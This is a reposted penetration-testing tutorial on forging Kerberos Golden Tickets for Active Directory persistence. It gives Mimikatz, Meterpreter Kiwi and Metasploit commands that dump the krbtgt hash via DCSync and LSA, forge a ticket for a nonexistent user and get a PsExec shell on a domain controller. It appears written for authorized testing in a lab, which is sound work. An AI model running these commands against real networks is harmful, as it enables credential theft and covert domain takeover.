Create Golden Ticket-泓源视野

Create Golden Ticket

Golden Ticket

Administrator Post Exploitation Golden Ticket, kerberos, kiwi, krbtgt, Metasploit, Mimikatz 4 Comments

Network penetration tests usually stop when domain administrator access has been obtained by the consultant. However domain persistence might be necessary if there is  project time to spent and there is a concern that access might be lost due to a variety of reasons such as:

  • Change of compromised Domain Admin Password
  • Detection of new domain administrator account

Benjamin Delpy discovered the Golden Ticket attack and since then various articles have been written around this topic and threat actors (Bronze Butler) are using this attack for domain persistence. This technique leverages the lack of validation on the Kerberos authentication protocol in order to impersonate a particular user valid or invalid. This is due to the fact that users that have a TGT (ticket granting ticket) in their current session will consider trusted for Kerberos and therefore can access any resource in the network.

Mimikatz support the creation of a golden ticket and its meterpreter extension kiwi. Metasploit Framework has a post exploitation module which can automate the activity. The creation of a golden ticket requires the following information:

  • Domain Name
  • Domain SID
  • Username to impersonate
  • krbtgt NTLM hash

Discovery of Golden Ticket Prerequisites

The Domain name and the domain SID can be obtained very easily by executing the whoami /user command or with the use of PsGetsid utility from PsTools.

12whoami /userPsGetsid64.exe pentestlab.local

Create Golden Ticket插图

Domain SID

The NTLM hash of the krbtgt account can be obtained via the following methods: 

  1. DCSync (Mimikatz)
  2. LSA (Mimikatz)
  3. Hashdump (Meterpreter)
  4. NTDS.DIT
  5. DCSync (Kiwi)

The DCSync is a mimikatz feature which will try to impersonate a domain controller and request account password information from the targeted domain controller. This technique is less noisy as it doesn’t require direct access to the domain controller or retrieving the NTDS.DIT file over the network.

1lsadump::dcsync /user:krbtgt

Create Golden Ticket插图1

Mimikatz – krbtgt NTLM Hash

Alternatively Mimikatz can retrieve the hash of the krbtgt account from the Local Security Authority (LSA) by executing Mimikatz on the domain controller.

12privilege::debuglsadump::lsa /inject /name:krbtgt

Create Golden Ticket插图2

Mimikatz – krbtgt NTLM Hash via LSA Dump

If there is a Meterpreter session with the domain controller the quickest method is the hashdump command:Create Golden Ticket插图3

Meterpreter – krbtgt NTLM Hash

The Kiwi extension also supports the DCSync method and can retrieve the SID, LM and NTLM hashes.

1dcsync_ntlm krbtgt

Create Golden Ticket插图4

Metasploit Kiwi DCSync – Retrieve the NTLM Hash

Mimikatz

A forged Golden ticket can be created with Mimikatz by using the obtained information.

12kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e/ticket:evil.tck /ptt

Create Golden Ticket插图5

Mimikatz – Golden Ticket Creation

The kerberos::list command will retrieve all the available Kerberos tickets and the kerberos::tgt will list the ticket that has been submitted for the current user session.

12kerberos::listkerberos::tgt

Create Golden Ticket插图6

Mimikatz – Kerberos Tickets

Since the ticket was generated with NTLM hash of the krbtgt account Kerberos will trust the ticket by default and therefore any user valid or invalid regardless of their privileges have unrestricted network access including access to the domain controller. This can be confirmed by listing the admin share on the domain controller.

1dir \\WIN-PTELU2U07KG\C$

Create Golden Ticket插图7

Golden Ticket – Executing Commands on the Domain Controller as standard user

Attempts to list the same share as user test without the Golden Ticket will fail.Create Golden Ticket插图8

Listing DC Admin Share without Golden Ticket

Shell access to the domain controller is also possible with the use of the PsExec utility. Kerberos will grant access by using the ticket in the current session even though that the user ‘evil’ is not valid.

1PsExec64.exe \\WIN-PTELU2U07KG\ cmd.exe

Create Golden Ticket插图9

Golden Ticket – Shell with PsExec as invalid user

Examining the list of domain users on the domain controller it is visible that the user evil doesn’t exist however he has domain administrator access.Create Golden Ticket插图10

Domain Users – Absence of evil user

It should be noted that the netbios name should be used for Kerberos authentication. Attempts to access the same resources with their correspondence IP addresses will fail with an access denied error since in this case NTLM authentication would be used and not the ticket.

Metasploit

In the scenario that domain administrator access has been obtained on the network and Metasploit Framework is used heavily in the assessment there is a Metasploit module which can automate the task of golden ticket.

1post/windows/escalate/golden_ticket

The module will try to obtain the required data automatically however since the information has been already retrieved it can be imported manually.Create Golden Ticket插图11

Metasploit – Golden Ticket Module Configuration

Metasploit will create, store and apply the ticket automatically to an existing Meterpreter session.Create Golden Ticket插图12

Metasploit – Golden Ticket

Kiwi

Mimikatz has been ported to Metasploit Framework as an extension called kiwi. From a Meterpreter session Kiwi can be loaded by running the following:

1meterpreter > load kiwi

The Golden Ticket can be created with kiwi by executing the following command:

12golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307-k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck

Create Golden Ticket插图13

Metasploit Kiwi – Golden Ticket

In order to apply the ticket to the existing session the kerberos_ticket_use needs to be used:

1kerberos_ticket_use /root/Downloads/pentestlabuser.tck

Verification that there is a Kerberos ticket for the current session

1kerberos_ticket_list

Create Golden Ticket插图14

Metasploit Kiwi – List of Kerberos Tickets

Resources can be accessed on the domain controller as pentestlabuser which is an account that doesn’t exist.

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
92

评论:

1 条评论,访客:0 条,站长:0 条

0%好评

  • 好评:(0%)
  • 中评:(0%)
  • 差评:(0%)

最新评论

  1. You are stealing
    You are stealing发布于: 

    Stealing articles from pentestlab.blog is lame. Remove it to avoid this to be exposed over Twitter publicly.

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8238047 位访客, 您的IP是:[3.236.86.184]